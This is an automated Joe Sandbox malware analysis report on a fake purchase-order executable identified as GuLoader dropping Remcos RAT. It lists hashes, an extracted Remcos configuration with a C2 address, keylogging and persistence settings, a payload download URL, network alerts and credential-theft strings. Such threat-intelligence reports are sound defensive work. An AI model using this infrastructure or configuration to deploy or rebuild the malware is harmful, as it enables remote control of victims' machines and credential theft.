Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
scan_241205-801_draft_PO.exe

Overview

General Information

Sample name:scan_241205-801_draft_PO.exe
Analysis ID:1569780
MD5:16df1bbb45f31ef099862d1df04b9741
SHA1:e9c1056bc30a3817d84656a944b39190cbb1b7c9
SHA256:b5486818c1913895b913ace02e94fee62a6468b3df96abd6c75c863499873dd2
Tags:exesigneduser-lowmal3
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Installs a global keyboard hook
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • scan_241205-801_draft_PO.exe (PID: 2128 cmdline: "C:\Users\user\Desktop\scan_241205-801_draft_PO.exe" MD5: 16DF1BBB45F31EF099862D1DF04B9741)
    • scan_241205-801_draft_PO.exe (PID: 3872 cmdline: "C:\Users\user\Desktop\scan_241205-801_draft_PO.exe" MD5: 16DF1BBB45F31EF099862D1DF04B9741)
      • scan_241205-801_draft_PO.exe (PID: 3716 cmdline: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe /stext "C:\Users\user\AppData\Local\Temp\vxhtinfano" MD5: 16DF1BBB45F31EF099862D1DF04B9741)
      • scan_241205-801_draft_PO.exe (PID: 5292 cmdline: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe /stext "C:\Users\user\AppData\Local\Temp\fzumjfqbbwepy" MD5: 16DF1BBB45F31EF099862D1DF04B9741)
      • scan_241205-801_draft_PO.exe (PID: 2164 cmdline: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe /stext "C:\Users\user\AppData\Local\Temp\itzekyavpewuiglw" MD5: 16DF1BBB45F31EF099862D1DF04B9741)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["162.251.122.87:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UOMZ21", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000002.3267786556.00000000032C2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.3266189424.000000000019F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000004.00000002.3267786556.00000000032DF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000000.00000002.2579216350.0000000006434000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: scan_241205-801_draft_PO.exe PID: 2128JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
              Click to see the 3 entries

              Stealing of Sensitive Information

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe, ProcessId: 3872, TargetFilename: C:\ProgramData\remcos\logs.dat
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-06T09:59:41.166077+010020365941Malware Command and Control Activity Detected192.168.2.549812162.251.122.872404TCP
              2024-12-06T09:59:43.369222+010020365941Malware Command and Control Activity Detected192.168.2.549818162.251.122.872404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-06T09:59:43.555357+010028033043Unknown Traffic192.168.2.549819178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-06T09:59:37.068311+010028032702Potentially Bad Traffic192.168.2.549801104.168.7.1680TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: scan_241205-801_draft_PO.exeAvira: detected
              Source: 00000004.00000002.3267786556.00000000032C2000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["162.251.122.87:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UOMZ21", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: http://104.168.7.16/WonMNkIofA233.binVirustotal: Detection: 7%Perma Link
              Source: scan_241205-801_draft_PO.exeReversingLabs: Detection: 34%
              Source: scan_241205-801_draft_PO.exeVirustotal: Detection: 22%Perma Link
              Source: Yara matchFile source: 00000004.00000002.3267786556.00000000032C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3266189424.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3267786556.00000000032DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: scan_241205-801_draft_PO.exe PID: 3872, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,5_2_00404423
              Source: scan_241205-801_draft_PO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: scan_241205-801_draft_PO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 4_2_341D10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_341D10F1
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 4_2_341D6580 FindFirstFileExA,4_2_341D6580
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407EF8
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407898

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49818 -> 162.251.122.87:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49812 -> 162.251.122.87:2404
              Source: Malware configuration extractorIPs: 162.251.122.87
              Source: global trafficTCP traffic: 192.168.2.5:49812 -> 162.251.122.87:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49801 -> 104.168.7.16:80
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49819 -> 178.237.33.50:80
              Source: global trafficHTTP traffic detected: GET /WonMNkIofA233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 104.168.7.16Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: global trafficHTTP traffic detected: GET /WonMNkIofA233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 104.168.7.16Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3288654881.00000000341A0000.00000040.10000000.00040000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000007.00000002.2737204231.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: scan_241205-801_draft_PO.exe, 00000005.00000003.2746410879.000000000094D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: scan_241205-801_draft_PO.exe, 00000005.00000003.2746410879.000000000094D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: scan_241205-801_draft_PO.exe, scan_241205-801_draft_PO.exe, 00000007.00000002.2737204231.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: scan_241205-801_draft_PO.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3288499288.00000000340B0000.00000040.10000000.00040000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3288499288.00000000340B0000.00000040.10000000.00040000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.0000000003288000.00000004.00000020.00020000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000004.00000002.3268084276.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.16/WonMNkIofA233.bin
              Source: bhvB489.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
              Source: bhvB489.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhvB489.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhvB489.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhvB489.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhvB489.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhvB489.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: bhvB489.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
              Source: bhvB489.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhvB489.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhvB489.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvB489.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhvB489.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhvB489.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhvB489.tmp.5.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhvB489.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
              Source: bhvB489.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhvB489.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvB489.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhvB489.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhvB489.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.00000000032C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.00000000032C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.00000000032C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpmiW
              Source: scan_241205-801_draft_PO.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhvB489.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhvB489.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhvB489.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhvB489.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhvB489.tmp.5.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhvB489.tmp.5.drString found in binary or memory: http://ocsp.msocsp.com0S
              Source: bhvB489.tmp.5.drString found in binary or memory: http://ocspx.digicert.com0E
              Source: bhvB489.tmp.5.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhvB489.tmp.5.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: scan_241205-801_draft_PO.exe, scan_241205-801_draft_PO.exe, 00000007.00000002.2737204231.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: scan_241205-801_draft_PO.exe, scan_241205-801_draft_PO.exe, 00000007.00000003.2736723800.000000000091D000.00000004.00000020.00020000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000007.00000002.2737204231.0000000000400000.00000040.80000000.00040000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000007.00000003.2736831556.000000000091D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: scan_241205-801_draft_PO.exe, 00000007.00000003.2736723800.000000000091D000.00000004.00000020.00020000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000007.00000003.2736831556.000000000091D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3288654881.00000000341A0000.00000040.10000000.00040000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000007.00000002.2737204231.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3288654881.00000000341A0000.00000040.10000000.00040000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000007.00000002.2737204231.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: bhvB489.tmp.5.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696428304750
              Source: scan_241205-801_draft_PO.exe, 00000005.00000002.2746788929.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: scan_241205-801_draft_PO.exe, 00000007.00000002.2737204231.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: bhvB489.tmp.5.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
              Source: bhvB489.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhvB489.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhvB489.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhvB489.tmp.5.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhvB489.tmp.5.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
              Source: bhvB489.tmp.5.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhvB489.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF
              Source: bhvB489.tmp.5.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?77686a33b2eafa1538ef78c3be5a5910
              Source: bhvB489.tmp.5.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?caa2cf97cacae25a18f577703684ee65
              Source: bhvB489.tmp.5.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e
              Source: bhvB489.tmp.5.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073
              Source: bhvB489.tmp.5.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7e9591e308dbda599df1fc08720a72a3
              Source: bhvB489.tmp.5.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?c6a2869c584d2ea23c67c44abe1ec326
              Source: bhvB489.tmp.5.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
              Source: bhvB489.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: bhvB489.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: bhvB489.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: scan_241205-801_draft_PO.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhvB489.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
              Source: bhvB489.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
              Source: bhvB489.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
              Source: bhvB489.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
              Source: bhvB489.tmp.5.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
              Source: bhvB489.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-04-14-10-35/PreSignInSettingsConfig.json
              Source: bhvB489.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=4954a0
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
